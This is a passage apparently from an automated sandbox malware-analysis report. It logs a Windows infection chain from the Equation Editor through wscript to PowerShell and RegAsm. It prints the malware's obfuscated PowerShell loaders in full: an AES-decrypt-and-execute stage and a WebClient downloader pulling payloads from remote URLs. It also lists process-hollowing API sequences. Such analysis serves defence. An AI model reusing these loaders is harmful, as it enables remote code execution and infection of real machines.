'+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_004180EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,8_2_004132D2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,8_2_0041BB09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,8_2_0041BB35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_004167B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002536C06_2_002536C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002596696_2_00259669
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E0CC8_2_0043E0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041F0FA8_2_0041F0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004541598_2_00454159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004381688_2_00438168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004461F08_2_004461F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E2FB8_2_0043E2FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045332B8_2_0045332B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042739D8_2_0042739D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004374E68_2_004374E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E5588_2_0043E558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004387708_2_00438770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004378FE8_2_004378FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004339468_2_00433946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044D9C98_2_0044D9C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427A468_2_00427A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041DB628_2_0041DB62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427BAF8_2_00427BAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437D338_2_00437D33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00435E5E8_2_00435E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00426E0E8_2_00426E0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043DE9D8_2_0043DE9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413FCA8_2_00413FCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00436FEA8_2_00436FEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100171948_2_10017194
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1000B5C18_2_1000B5C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B04012_2_0044B040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043610D12_2_0043610D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044731012_2_00447310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A49012_2_0044A490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040755A12_2_0040755A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043C56012_2_0043C560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B61012_2_0044B610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044D6C012_2_0044D6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004476F012_2_004476F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B87012_2_0044B870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044081D12_2_0044081D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041495712_2_00414957
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004079EE12_2_004079EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407AEB12_2_00407AEB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044AA8012_2_0044AA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00412AA912_2_00412AA9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404B7412_2_00404B74
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404B0312_2_00404B03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044BBD812_2_0044BBD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404BE512_2_00404BE5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404C7612_2_00404C76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00415CFE12_2_00415CFE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00416D7212_2_00416D72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00446D3012_2_00446D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00446D8B12_2_00446D8B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406E8F12_2_00406E8F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040503814_2_00405038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041208C14_2_0041208C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004050A914_2_004050A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040511A14_2_0040511A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043C13A14_2_0043C13A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004051AB14_2_004051AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044930014_2_00449300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040D32214_2_0040D322
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A4F014_2_0044A4F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043A5AB14_2_0043A5AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041363114_2_00413631
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044669014_2_00446690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A73014_2_0044A730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004398D814_2_004398D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004498E014_2_004498E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A88614_2_0044A886
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DA0914_2_0043DA09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00438D5E14_2_00438D5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449ED014_2_00449ED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041FE8314_2_0041FE83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00430F5414_2_00430F54
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004050C215_2_004050C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004014AB15_2_004014AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040513315_2_00405133
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004051A415_2_004051A4
